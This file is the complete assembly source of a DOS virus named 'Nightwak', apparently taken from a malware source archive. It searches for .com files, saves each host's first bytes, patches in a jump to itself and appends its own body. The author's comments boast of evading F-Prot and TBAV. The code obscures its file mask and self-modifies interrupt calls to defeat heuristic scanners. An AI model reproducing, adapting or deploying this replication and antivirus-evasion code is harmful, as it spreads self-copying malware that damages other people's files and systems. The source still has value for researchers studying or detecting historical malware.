MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.nightwak.asm
2021-01-12 17:52:14 -06:00

120 lines
2.7 KiB
NASM

;
; Simple com appender destined to be another SillyC
; so im putting the file name in as the virus name .. nuff said
;
; Unscannable by F-Prot & by TBAV with no flags
; Uses a novel way of beating S flag
;
; Scans as a VCL/IVP variant with AVP/DSAV
;
.model tiny
.code
org 100h
begin:
db 0E9h
dw offset start-103h
start:
call delta
delta:
pop bp
sub bp,offset delta
and word ptr [begin],0
and byte ptr [begin+2],0
or ah,[old_bytes+bp]
or al,[old_bytes+bp+1]
or bh,[old_bytes+bp+2]
or byte ptr [begin],ah
or byte ptr [begin+1],al
or byte ptr [begin+2],bh
and byte ptr [f_string+bp],7Fh
and byte ptr [f_string+bp+1],7Fh
and byte ptr [f_string+bp+2],7Fh
and byte ptr [f_string+bp+3],7Fh
and byte ptr [f_string+bp+4],7Fh
mov dh,1ah
lea ax,[bp+offset dta]
xchg ax,dx
int 21h
mov dh,4eh
find_next:
xor cx,cx
lea ax,[bp+offset f_string]
xchg ax,dx
int 21h
jc done2
mov cl,[dta+1ah+bp]
mov ch,[dta+1bh+bp]
sub cx,3
mov [new_bytes+1+bp],cl
mov [new_bytes+2+bp],ch
mov dx,3D02h
lea ax,[bp+offset dta+1Eh]
xchg ax,dx
int 21h
xchg ax,bx
mov dh,3fh
mov cx,3
lea ax,[bp+offset old_bytes]
xchg ax,dx
int 21h
cmp [bp+old_bytes],0E9h
jne okay
mov ah,3eh
int 21h
mov dh,4fh
jmp find_next
done2:
jmp done
okay:
mov dx,4200h
xor cx,cx
xor ax,ax
xchg ax,dx
int 21h
mov dh,40h
mov cx,3
lea ax,[bp+offset new_bytes]
xchg ax,dx
and byte ptr [n1+bp+1],7fh
n1:
int 0A1h
mov byte ptr [n1+bp+1],0A1h
mov dx,4202h
xor cx,cx
xor ax,ax
xchg ax,dx
int 21h
mov dh,40h
mov cx, offset theend - offset start + 56
or byte ptr [f_string+bp],80h
or byte ptr [f_string+bp+1],80h
or byte ptr [f_string+bp+2],80h
or byte ptr [f_string+bp+3],80h
or byte ptr [f_string+bp+4],80h
lea ax,[bp+offset start]
xchg ax,dx
and byte ptr [n2+bp+1],7fh
n2:
int 0A1h
mov ah,3Eh
int 21h
done:
mov ax,101h
xor bx,bx
xchg ax,bx
xor cx,cx
dec bx
xor dx,dx
push bx
xor bp,bp
xor bx,bx
ret
;danke db 'Nightwak'
theend:
.data
old_bytes db 0c3h,90h,90h
new_bytes db 0E9h, 2 dup (0)
dta db 42 dup(0)
f_string db '*'+80h,'.'+80h,'c'+80h,'o'+80h,'m'+80h,0,0
end begin